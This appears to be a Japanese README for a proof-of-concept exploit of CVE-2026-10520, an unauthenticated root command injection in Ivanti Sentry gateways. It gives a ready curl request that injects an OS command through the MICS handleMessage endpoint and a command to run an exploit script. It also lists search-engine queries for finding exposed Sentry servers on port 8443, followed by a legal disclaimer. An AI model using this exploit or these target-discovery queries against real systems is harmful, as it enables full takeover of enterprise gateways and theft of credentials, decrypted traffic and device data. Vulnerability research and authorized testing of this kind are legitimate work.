
Ivanti SentryにおけるOSコマンドインジェクションを介したルートレベルRCE
Ivanti Sentry(旧MobileIron Sentry)は、モバイルデバイスと企業バックエンドリソース(メール、SharePoint、内部Webアプリケーション)間のトラフィックをプロキシするエンタープライズセキュリティゲートウェイです。Mobile Device Management(MDM)ポリシーを適用し、暗号化されたモバイルセッションを終了し、エンタープライズアプリの展開のために証明書ベースの認証を発行します。Sentryインスタンスは通常、インターネットに公開されたポート8443上で動作し、MICS(Mobile Iron Configuration Service)管理APIを公開します。
CVE-2026-10520 は、Ivanti Sentry R10.5.2、R10.6.2、R10.7.1より前のバージョンに影響する認証不要のOSコマンドインジェクション脆弱性です(CVSSv3.1: 10 Critical、CISA KEVに掲載)。欠陥はMICS APIエンドポイント /mics/api/v2/sentry/mics-config/handleMessage にあり、URLエンコードされた message POST ボディを介してXMLラップされたシステムコマンドを、認証や入力検証なしで受け入れます。脆弱なエンドポイントに到達した攻撃者は、rootとして任意のOSコマンドを実行でき、ホストの完全な制御を取得します。これには、復号化されたエンタープライズトラフィック、保存された認証情報、管理対象の全モバイルデバイスデータが含まれます。
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443このリポジトリとその内容は、正当なセキュリティ研究、許可されたペネトレーションテスト、教育研究、防御目的のみに提供されています。本資料にアクセスまたは使用することにより、お客様の活動がすべての適用される法律に準拠していること、およびお客様が所有していないシステムに対してテストまたは適用する前に適切な許可を得ていることを確認する責任を負うものとします。
このプロジェクトの作成者およびメンテナは、この情報の適用に起因する損害、法的影響、または誤用について一切の責任を負いません。不正アクセス、悪意のある活動、または違法な目的での使用は明示的に禁止され、サポートされません。
責任を持って使用してください。法的に行動してください。自分が所有するシステム、または明示的な書面による許可を得たシステムのみをテストしてください。
SCT-PL